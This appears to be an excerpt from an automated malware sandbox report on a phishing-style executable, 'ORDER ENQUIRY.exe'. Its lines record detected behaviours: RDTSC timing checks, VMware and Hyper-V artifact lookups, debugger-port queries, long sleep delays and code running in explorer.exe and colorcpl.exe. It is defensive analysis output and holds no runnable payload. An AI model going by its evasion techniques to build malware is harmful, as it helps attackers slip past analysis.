          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: ORDER ENQUIRY.exe PID: 3032, type: MEMORYSTR
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 2879904 second address: 287990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 2879B6E second address: 2879B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: 92A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: A2A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: A4A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: B4A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: BA80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: CA80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4825Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5110Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 893Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 1840Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 8131Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13905
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 2.2 %
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe TID: 3868Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1076Thread sleep count: 4825 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1076Thread sleep time: -9650000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1076Thread sleep count: 5110 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1076Thread sleep time: -10220000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192Thread sleep count: 1840 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192Thread sleep time: -3680000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192Thread sleep count: 8131 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3192Thread sleep time: -16262000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000002.4553917152.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000004.00000002.4556219779.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000002.4553917152.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000004.00000002.4556219779.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000000.2100807606.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000004.00000002.4550702238.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000002.4556219779.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.4553917152.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0040ACE0 LdrLoadDll,3_2_0040ACE0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF0185 mov eax, dword ptr fs:[00000030h]3_2_01AF0185
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B54180 mov eax, dword ptr fs:[00000030h]3_2_01B54180
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B54180 mov eax, dword ptr fs:[00000030h]3_2_01B54180
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]3_2_01AAA197
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]3_2_01AAA197
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]3_2_01AAA197
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6C188 mov eax, dword ptr fs:[00000030h]3_2_01B6C188
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6C188 mov eax, dword ptr fs:[00000030h]3_2_01B6C188
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE01F8 mov eax, dword ptr fs:[00000030h]3_2_01AE01F8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B861E5 mov eax, dword ptr fs:[00000030h]3_2_01B861E5
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E1D0 mov ecx, dword ptr fs:[00000030h]3_2_01B2E1D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]3_2_01B761C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]3_2_01B761C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE0124 mov eax, dword ptr fs:[00000030h]3_2_01AE0124
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B70115 mov eax, dword ptr fs:[00000030h]3_2_01B70115
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5A118 mov ecx, dword ptr fs:[00000030h]3_2_01B5A118
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]3_2_01B84164
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]3_2_01B84164
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B48158 mov eax, dword ptr fs:[00000030h]3_2_01B48158
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B44144 mov ecx, dword ptr fs:[00000030h]3_2_01B44144
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAC156 mov eax, dword ptr fs:[00000030h]3_2_01AAC156
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]3_2_01AB6154
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]3_2_01AB6154
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA80A0 mov eax, dword ptr fs:[00000030h]3_2_01AA80A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B760B8 mov eax, dword ptr fs:[00000030h]3_2_01B760B8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B760B8 mov ecx, dword ptr fs:[00000030h]3_2_01B760B8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B480A8 mov eax, dword ptr fs:[00000030h]3_2_01B480A8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB208A mov eax, dword ptr fs:[00000030h]3_2_01AB208A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB80E9 mov eax, dword ptr fs:[00000030h]3_2_01AB80E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAA0E3 mov ecx, dword ptr fs:[00000030h]3_2_01AAA0E3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B360E0 mov eax, dword ptr fs:[00000030h]3_2_01B360E0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAC0F0 mov eax, dword ptr fs:[00000030h]3_2_01AAC0F0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF20F0 mov ecx, dword ptr fs:[00000030h]3_2_01AF20F0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B320DE mov eax, dword ptr fs:[00000030h]3_2_01B320DE
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B46030 mov eax, dword ptr fs:[00000030h]3_2_01B46030
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAA020 mov eax, dword ptr fs:[00000030h]3_2_01AAA020
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAC020 mov eax, dword ptr fs:[00000030h]3_2_01AAC020
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B34000 mov ecx, dword ptr fs:[00000030h]3_2_01B34000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B52000 mov eax, dword ptr fs:[00000030h]3_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE016 mov eax, dword ptr fs:[00000030h]3_2_01ACE016
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADC073 mov eax, dword ptr fs:[00000030h]3_2_01ADC073
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36050 mov eax, dword ptr fs:[00000030h]3_2_01B36050
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB2050 mov eax, dword ptr fs:[00000030h]3_2_01AB2050
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAE388 mov eax, dword ptr fs:[00000030h]3_2_01AAE388
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]3_2_01AD438F
